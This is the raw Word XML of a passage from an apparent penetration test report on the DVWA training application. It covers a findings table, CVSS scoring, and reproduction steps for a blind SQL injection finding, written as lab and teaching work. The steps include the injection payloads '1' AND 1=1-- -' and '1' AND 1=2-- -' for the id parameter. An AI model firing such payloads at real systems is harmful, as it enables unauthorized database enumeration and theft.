                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="118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51994D00" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134"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238BEC0D" w14:textId="256E7AFE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.</w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B" w:rsidR="10A231D6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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07EA2324" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="03E66DE5" w14:paraId="3FD09A4C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="87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3364E767" w14:textId="0A1A82CB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E5FA3"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E5FA3"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>F-00</w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B" w:rsidR="082D487A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E5FA3"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3449"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82D487A" w:rsidP="485EA61B" w:rsidRDefault="082D487A" w14:paraId="2D8D6C47" w14:textId="37D0A319">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open HTTP Redirect allowing malicious external redirection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473"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82D487A" w:rsidP="485EA61B" w:rsidRDefault="082D487A" w14:paraId="666A8037" w14:textId="4FF92DB8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1187"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82D487A" w:rsidP="485EA61B" w:rsidRDefault="082D487A" w14:paraId="4EC9BE56" w14:textId="1ED225FC">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134"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34CACDE1" w14:textId="6CB85109">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="03E66DE5" w:rsidR="366036FD">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidRPr="03E66DE5" w:rsidR="5259E4EF">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="124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P="485EA61B" w:rsidRDefault="485EA61B" w14:paraId="465C0277" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="1FC39945" w14:textId="77777777">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="0EC0B086" w14:paraId="6A3E9EA4" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading10"/>
        <w:shd w:val="clear" w:color="auto" w:fill="1A2B4A"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:t>5. Detailed Findings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="1CD77F7D" w14:paraId="7A4D37BC" w14:textId="77777777">
      <w:pPr>
        <w:pageBreakBefore/>
        <w:shd w:val="clear" w:color="auto" w:fill="2E5FA3"/>
        <w:spacing w:before="200" w:after="100"/>
        <w:ind w:right="120"/>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>F-001  |  Boolean-Based Blind SQL Injection Leading to Unauthorized Database Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="34CE0A41" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="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966105" w:rsidTr="356A7C40" w14:paraId="61FFBD3A"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59AD10AE" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Title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6065CA3B" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Boolean-Based Blind SQL Injection Leading to Unauthorized Database Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="4AE197DC"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343E6542" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FADBD8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="27563CAB" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="172B10AE"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0E8ECEA6" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Score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71165016" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="08311C22"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3F98CBF6" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Vector</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356A7C40" w14:paraId="41D630FF" w14:textId="77777777">
            <w:r w:rsidRPr="356A7C40">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="03FB4239"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62F360E5" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP Category</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28DE5C4B" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A03: Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="54CBDEF7"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01696FEF" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Affected URL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7965BFB8" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>http://localhost:4280/vulnerabilities/sqli_blind/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="62EBF3C5" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="31FF54C8" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="356A7C40" w14:paraId="7107E928" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r w:rsidRPr="356A7C40">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>The application is vulnerable to Boolean-Based Blind SQL Injection through the id input parameter in the blind SQL injection module. Unlike standard SQL injection where query results are directly visible, this vulnerability allows attackers to infer sensitive database information by observing differences in application responses based on true or false conditions. By injecting crafted SQL conditions, it was possible to confirm valid SQL execution and enumerate the backend database without direct access to query output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="6D98A12B" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="18F05496" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>CVSS Breakdown</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60"/>
        <w:gridCol w:w="2520"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="59016B43" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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03DECD36" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="252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6D3D45CB" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Value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0FBE1196" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="74BDA273"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022D7B7" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Version</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F7BA2E8" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.1</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3D9485BB" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Common Vulnerability Scoring System version used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="2038460E"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53ED6D71" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Vector (AV)</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41D5712" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>N (Network)</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4EEA09D" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The vulnerability can be exploited remotely over a network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="2E066B49"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345B9E05" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Complexity (AC)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8927C17" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>L (Low)</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3DBC518C" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploitation is straightforward and does not require special conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="4D979903"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08A3B5B" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Privileges Required (PR)</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4AF1DA60"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368355EE" w14:textId="77777777">
            <w:r w:rsidRPr="356A7C40">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No authentication or prior access is required to exploit the vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="2C1951C6"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345537C" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User Interaction (UI)</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DA09557"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356A7C40" w14:paraId="250086DE" w14:textId="77777777">
            <w:r w:rsidRPr="356A7C40">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No action from another user is required for successful exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="79D878DD"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8F04DF3" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Scope (S)</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858A681" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>U (Unchanged)</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213FA179" w14:textId="77777777">
            <w:r w:rsidRPr="356A7C40">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The impact remains within the same security boundary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="383A6E2B"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F00818D" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confidentiality Impact (C)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89B5121"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318BCB0" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sensitive data can be fully disclosed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="7005A571"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2200EBA" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Integrity Impact (I)</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4D37D355"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37C680E5" w14:textId="77777777">
            <w:r w:rsidRPr="356A7C40">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Data can be modified or tampered with</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="4A65BDD8"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435E44A" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Availability Impact (A)</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108DEE0"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583335D" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Service or system availability can be significantly affected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966105" w:rsidTr="356A7C40" w14:paraId="79E9818F"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525AC9BB" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Overall Score</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D7D9316" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.8 (Critical)</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6C24E0E5" w14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severe vulnerability with maximum business and security impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="2946DB82" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="0EC0B086" w14:paraId="205F1F7D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="46997AE6" w14:textId="6258FF54">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>Navigate to the Blind SQL Injection module in DVWA:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="20B340F6" w14:textId="591F5253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>http://localhost:4280/vulnerabilities/sqli_blind/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="2B2C922E" w14:textId="650CF2BF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Intercept the request using Burp Suite and identify the vulnerable id parameter. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="45798C83" w14:textId="028BC270">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>Modify the id parameter with the following SQL payload to test a true condition:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="61A98C29" w14:textId="28A6CA8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>1' AND 1=1-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="1EC89AE2" w14:textId="6AC9E9D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>Send the modified request and observe the application response:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="0B3FECCF" w14:textId="3F81C982">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>"User ID exists in the database"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="41FCB83B" w14:textId="366955A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>This confirms that the injected SQL condition evaluated as true.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="1002E79B" w14:textId="3D9A183E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>Modify the same parameter with a false condition:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="20DA9DCA" w14:textId="47156882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>1' AND 1=2-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="728A8EEB" w14:textId="7FE70FBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>Send the request again and observe the changed response:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="30E24DDD" w14:textId="3C4534F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>"User ID is MISSING from the database"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="4B0E7250" w14:textId="27BE29F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>This confirms that the application behavior changes based on SQL query evaluation, proving the presence of Blind SQL Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="536FE61A" w14:textId="06711272">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>Perform database enumeration by identifying the length of the database name using the following payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="37723552" w14:textId="45C3EC0D">
      <w:pPr>
